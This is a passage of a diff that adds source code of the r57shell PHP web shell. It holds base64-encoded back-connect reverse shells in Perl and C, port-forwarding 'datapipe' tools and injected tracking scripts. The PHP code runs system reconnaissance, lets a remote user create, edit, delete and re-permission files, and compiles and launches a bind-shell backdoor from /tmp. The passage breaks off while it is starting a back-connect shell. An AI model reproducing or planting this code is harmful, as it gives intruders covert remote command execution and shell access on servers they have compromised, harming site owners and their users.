+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
+aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ
+lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm
+xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga
+W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy
+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2
+JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l
+lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW
+FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L
+3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr
+J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR
+oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj
+xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO
+i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv
+dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB
+ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2
+hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";
+$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh
+IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl
+hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz
+tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa
+XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u
+8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV
+ybmV0LS0+";
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "";
+@readfile ("");}}
+echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp;
+<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b>
+</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';
+echo ws(2);
+echo "<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2);
+echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>"));
+echo ws(2);
+echo "PHP version: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+echo ws(2);
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
+echo ws(2);
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo ws(2);
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo ws(2);
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>".ws(2);
+echo "Disable functions : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = @round(100/($all/$free),2);
+echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
+<tr><td align=right width=100>';
+echo $font;
+if(!$windows){
+echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+$uname = ex('uname -a');
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+if(!$safe_mode){
+$bsd1 = ex('sysctl -n kern.ostype');
+$bsd2 = ex('sysctl -n kern.osrelease');
+$lin1 = ex('sysctl -n kernel.ostype');
+$lin2 = ex('sysctl -n kernel.osrelease');
+}
+if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; }
+else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; }
+else { $sysctl = "-"; }
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+$id = ex('id');
+echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>"));
+echo ws(3).$dir;
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=Verdana size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@get_current_user()."<br>";
+echo ws(3).$dir."<br>";
+echo "</font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(empty($c1)||empty($c2)) { die(); }
+$f = '<br>';
+$f .= base64_decode($c1);
+$f .= base64_decode($c2);
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { echo ce($_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); }
+ else {
+ @fwrite($file,$_POST['e_text']);
+ @fclose($file);
+ $_POST['cmd']="";
+ echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
+ }
+ }
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
+{
+ cf("/tmp/bd.c",$port_bind_bd_c);
+ $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
+ @unlink("/tmp/bd.c");
+ $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
+ $_POST['cmd']="ps -aux | grep bd";
+}
+if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
+{
+ cf("/tmp/bdpl",$port_bind_bd_pl);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
+ $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
+ $_POST['cmd']="ps -aux | grep bdpl";
+}
+if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
+{
+ cf("/tmp/back",$back_connect);
+ $p2=which("perl");
+ if(empty($p2)) $p2="perl";
